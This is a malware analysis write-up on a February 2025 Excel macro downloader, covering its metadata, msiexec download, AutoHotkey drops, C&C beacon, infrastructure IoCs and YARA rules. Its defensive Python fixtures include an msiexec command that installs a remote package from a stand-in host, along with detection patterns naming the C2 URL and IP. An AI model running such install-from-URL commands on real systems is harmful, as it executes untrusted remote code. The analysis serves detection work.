In this article I analyze a macro downloader threat that was last modified on 13 February 2025. When opened, it shows the following Excel image, which stands in for a real document.
The SHA-256 hash of the analyzed threat is 29ab17e91744c5e639dbfa1a84deb66eb30582b28e78dc8a7181ba90426dcd23
By analyzing the metadata of the macro malware we can see that the author of the modifications is “bsAdmin” and that the Excel document was last modified on 13 February 2025 at 16:27 (UTC).
Here we have the reference to the VBA macro code:
The sheet of the malicious document carries a sheetProtection element whose password hash uses the SHA-512 algorithm:
After removing the sheetProtection we can see the following document:
The following is all of the macro code. It also shows the placement of the document image with ActiveSheet.Pictures, where the expression 8888-8887 evaluates to 1 so that the Auto_Open function addresses the first image. The Main macro is empty.
A deeper analysis of the drawing1.xml part reveals the downloader URL, passed as the parameter of an “InstallProduct” call on the ActiveXObject held in the variable “r”. The URL acusense[.]ae/umbrella currently serves no content (it is “empty”).
There is a reference to the folder C:\Users\bsAdmin\Desktop\NEW SEND, which points to the environment in which the malicious macro document was developed.
The following are the metadata details of the vbaProject part, including the ContentType entry that marks the workbook as macro-enabled, “application/vnd.ms-excel.sheet.macroEnabled.main+xml”.
Here are the attributes of Sheet1 and of the Workbook of the Excel document, extracted without using the LibreOffice macro editor.
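The static checks described above (last-modified author and timestamp, macro-enabled content type, presence of vbaProject.bin, SHA-512 sheet protection, and URLs or build paths left in drawing parts) can all be done by unzipping the OOXML container without ever opening the workbook in Excel. The script below is an added example, not code from this write-up; it builds a constructed minimal .xlsm in memory (placeholder VBA blob, placeholder URL malicious.example and a placeholder build path) that mimics the layout of the real sample, then triages it. The schema-host filter is there because every OOXML part declares namespace URIs that would otherwise be reported as indicators.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Standard OOXML namespaces (public schema URIs, not values taken from the sample)
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dcterms": "http://purl.org/dc/terms/",
    "ct": "http://schemas.openxmlformats.org/package/2006/content-types",
    "s": "http://schemas.openxmlformats.org/spreadsheetml/2006/main",
}
MACRO_CT = "application/vnd.ms-excel.sheet.macroEnabled.main+xml"
URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w./\-?=&%]*)?")
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^\"'<>\r\n]+")
# Schema hosts that legitimately appear in every OOXML part; never report them as IoCs
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "purl.org", "www.w3.org"}


def triage_workbook(data: bytes) -> dict:
    """Static triage of an OOXML workbook held in memory. The container is only
    unzipped and parsed, never opened by Excel, so no macro can run."""
    report = {"macro_enabled": False, "has_vba": False, "last_modified_by": None,
              "modified": None, "sheet_protection": [], "urls": [], "paths": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        report["has_vba"] = "xl/vbaProject.bin" in names
        if "[Content_Types].xml" in names:
            types = ET.fromstring(z.read("[Content_Types].xml"))
            report["macro_enabled"] = any(
                o.get("ContentType") == MACRO_CT for o in types.iter(f"{{{NS['ct']}}}Override"))
        if "docProps/core.xml" in names:
            core = ET.fromstring(z.read("docProps/core.xml"))
            who = core.find("cp:lastModifiedBy", NS)
            when = core.find("dcterms:modified", NS)
            report["last_modified_by"] = who.text if who is not None else None
            report["modified"] = when.text if when is not None else None
        for name in names:
            if name.startswith("xl/worksheets/") and name.endswith(".xml"):
                for sp in ET.fromstring(z.read(name)).iter(f"{{{NS['s']}}}sheetProtection"):
                    report["sheet_protection"].append(
                        {"part": name, "algorithm": sp.get("algorithmName"),
                         "hashed": sp.get("hashValue") is not None})
            elif name.startswith("xl/drawings/") and name.endswith(".xml"):
                # Drawing parts are plain XML; a regex sweep catches strings hidden in attributes
                text = z.read(name).decode("utf-8", "replace")
                for url in URL_RE.findall(text):
                    if urlsplit(url).hostname not in SCHEMA_HOSTS and url not in report["urls"]:
                        report["urls"].append(url)
                for path in WIN_PATH_RE.findall(text):
                    if path not in report["paths"]:
                        report["paths"].append(path)
    return report


def build_sample_workbook() -> bytes:
    """Constructed minimal .xlsm mimicking the parts described in the write-up.
    The vbaProject.bin is a placeholder blob, not real VBA; URL and path are placeholders."""
    parts = {
        "[Content_Types].xml":
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Override PartName="/xl/workbook.xml" ContentType="' + MACRO_CT + '"/>'
            '<Override PartName="/xl/vbaProject.bin" '
            'ContentType="application/vnd.ms-office.vbaProject"/></Types>',
        "docProps/core.xml":
            '<cp:coreProperties xmlns:cp="' + NS["cp"] + '" xmlns:dcterms="' + NS["dcterms"] + '" '
            'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
            '<cp:lastModifiedBy>bsAdmin</cp:lastModifiedBy>'
            '<dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-13T16:27:00Z</dcterms:modified>'
            '</cp:coreProperties>',
        "xl/vbaProject.bin": b"\xd0\xcf\x11\xe0 placeholder OLE blob",
        "xl/worksheets/sheet1.xml":
            '<worksheet xmlns="' + NS["s"] + '"><sheetProtection algorithmName="SHA-512" '
            'hashValue="AAAA" saltValue="BBBB" spinCount="100000" sheet="1"/></worksheet>',
        "xl/drawings/drawing1.xml":
            '<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing">'
            '<xdr:pic descr="InstallProduct(http://malicious.example/umbrella) '
            'C:\\Users\\builder\\Desktop\\NEW SEND"/></xdr:wsDr>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, content in parts.items():
            z.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in triage_workbook(build_sample_workbook()).items():
        print(f"{key}: {value}")
```

To run it against a real file, pass `open(path, "rb").read()` to `triage_workbook`; a workbook that is macro-enabled, ships a vbaProject.bin, protects its sheet with a hashed password and carries a non-schema URL in a drawing part is worth detonating rather than opening.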
By analyzing a detonation of the macro malware we can see a child msiexec.exe process that connects to the URL acusense[.]ae/umbrella. The detonation also shows drop operations for the AutoHotkey threat AutoNotify.ahk and for the dropped Portable Executable AutoNotify.exe.
The hash of the dropped Trojan artifact is 6a98b438b67da7316e9251eb1a92cd5384a8349d239a77903f7282fa076a77c3. Here are the details of the Base64-encoded external C&C connection:
By decoding the payload of the C&C connection we can see details of the victim, such as sessionid, userid and host details, together with the etag, which can be used to track the connection session itself.
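The three detonation observations above (Office spawning msiexec.exe with a remote package, the .ahk script dropped next to a PE, and a beacon whose body is Base64 text carrying sessionid, userid, host and etag) translate directly into detection logic. The script below is an added example, not code from this write-up or from any sandbox product; it runs three checks over a constructed list of sandbox-style events (placeholder hostnames, IDs and paths), including one benign msiexec.exe launch from explorer.exe that must not fire. The beacon decoder tolerates the base64url alphabet and stripped padding, which is what a captured query string usually looks like.

```python
import base64
import binascii
import urllib.parse

# Constructed beacon body; a real capture would carry the string as-is.
# Padding is stripped on purpose to exercise the repair path in decode_beacon().
_BEACON = base64.urlsafe_b64encode(
    b"sessionid=5f1c2a&userid=1042&host=WIN-VICTIM01&etag=7c9e-2a11"
).decode().rstrip("=")

# Constructed sandbox-style events mimicking the detonation described above.
EVENTS = [
    {"type": "process", "parent": "EXCEL.EXE", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i http://malicious.example/umbrella /qn"},
    {"type": "file_write", "image": "msiexec.exe",
     "path": "C:\\Users\\victim\\AppData\\Local\\Temp\\AutoNotify.ahk"},
    {"type": "file_write", "image": "msiexec.exe",
     "path": "C:\\Users\\victim\\AppData\\Local\\Temp\\AutoNotify.exe"},
    {"type": "network", "image": "AutoNotify.exe", "dst": "192.0.2.10:443",
     "uri": "/api/check?data=" + _BEACON},
    # Benign: a local package installed from the shell, not from an Office process
    {"type": "process", "parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\installers\\vendor.msi /qn"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
INSTALLERS = {"msiexec.exe"}


def office_spawned_remote_installer(events):
    """Office parent -> msiexec child whose command line references a remote package."""
    return [e["cmdline"] for e in events
            if e["type"] == "process"
            and e["parent"].lower() in OFFICE_APPS
            and e["image"].lower() in INSTALLERS
            and "http" in e["cmdline"].lower()]


def dropped_ahk_bundle(events):
    """Every file written by a process that also dropped an AutoHotkey script,
    so the companion .exe is reported together with the .ahk."""
    droppers = {e["image"] for e in events
                if e["type"] == "file_write" and e["path"].lower().endswith(".ahk")}
    return [e["path"] for e in events
            if e["type"] == "file_write" and e["image"] in droppers]


def decode_beacon(token):
    """Decode a base64 or base64url token with missing padding into key/value fields.
    Returns None when the token is not valid base64 or does not decode to UTF-8 text."""
    t = token.strip().replace(" ", "+").replace("-", "+").replace("_", "/")
    t += "=" * (-len(t) % 4)
    try:
        text = base64.b64decode(t, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    fields = dict(urllib.parse.parse_qsl(text, keep_blank_values=True))
    return fields or None


def beacons(events):
    """Decode every query-string value of outbound requests that parses as a field set."""
    out = []
    for e in events:
        if e["type"] != "network":
            continue
        query = urllib.parse.urlsplit(e["uri"]).query
        for _, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
            fields = decode_beacon(value)
            if fields:
                out.append({"dst": e["dst"], "image": e["image"], "fields": fields})
    return out


def triage(events):
    """Human-readable findings; the sessionid/etag pair is the pivot for correlating beacons."""
    findings = []
    for c in office_spawned_remote_installer(events):
        findings.append(f"office->installer with remote package: {c}")
    for p in dropped_ahk_bundle(events):
        findings.append(f"AutoHotkey bundle drop: {p}")
    for b in beacons(events):
        f = b["fields"]
        findings.append(f"beacon to {b['dst']} from {b['image']}: session={f.get('sessionid')} "
                        f"user={f.get('userid')} host={f.get('host')} etag={f.get('etag')}")
    return findings


if __name__ == "__main__":
    for line in triage(EVENTS):
        print(line)
```

The decoded sessionid and etag are the values to carry into the SIEM: a second host reporting the same etag to the same destination is the same operator session, which is a stronger correlation than the destination IP alone.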
The C&C domain acusense[.]ae is registered with Cloudns[.]io, and the certificate subject shows a mysitepreview.co.uk domain:
The domain in question appears in a recent Pulse (an IoC collection) dated 14 February 2025:
The site was built with PHP 8.1.31 and WordPress 6.7.2:
The domain acusense[.]ae is linked to several malicious macro threats; it appears to have originally been a legitimate domain of a smart security camera vendor that was later compromised and reused for malicious purposes and infections:
The IP address 181.49.105[.]59, used for the C&C communications, is registered to Telmex Colombia S.A. in Colombia. It exposes many open ports, such as 80 (HTTP), 137 (NetBIOS), 445 (SMB), 1433 (MSSQL), 5985 (WinRM) and 8009 (APACHE_JSERV).
Port 7070 is associated with AnyDesk remote control:
The server in question runs Apache Tomcat version 8.5.39:
The JARM TLS fingerprint 2ad2ad16d2ad2ad22c2ad2ad2ad2adfd9c9d14e4f4f67f94f0359f8b28f532 is also shared with other malicious or suspicious IP addresses:
YARA rules (VirusTotal Livehunt, using the "vt" module; the first matches URL objects, the second IP objects):

import "vt"

rule macro_13th_February_2025_Downloader {
    meta:
        description = "Detects Macro Downloader threat developed on 13th February 2025"
    condition:
        vt.net.url.raw icontains "https://acusense.ae/umbrella" or vt.net.url.raw icontains "181.49.105.59"
}

import "vt"

rule macro_13th_February_2025_Downloader_JARM {
    meta:
        name = "Detects Macro Downloader threat developed on 13th February 2025 with JARM thumbprint"
    condition:
        vt.net.ip.jarm == "2ad2ad16d2ad2ad22c2ad2ad2ad2adfd9c9d14e4f4f67f94f0359f8b28f532"
}
CONCLUSIONS:
Macro malware threats are increasingly hosting their payloads on compromised legitimate domains, which makes it easier to bypass checks aimed at recently registered domains: several SIEM platforms ship analysis rules that flag newly registered domains as suspicious, and an established domain slips past them. The C&C communication method is also notable for its structure and for the remote-access capabilities that accompany it (the AutoHotkey payload and the AnyDesk port observed on the C&C host).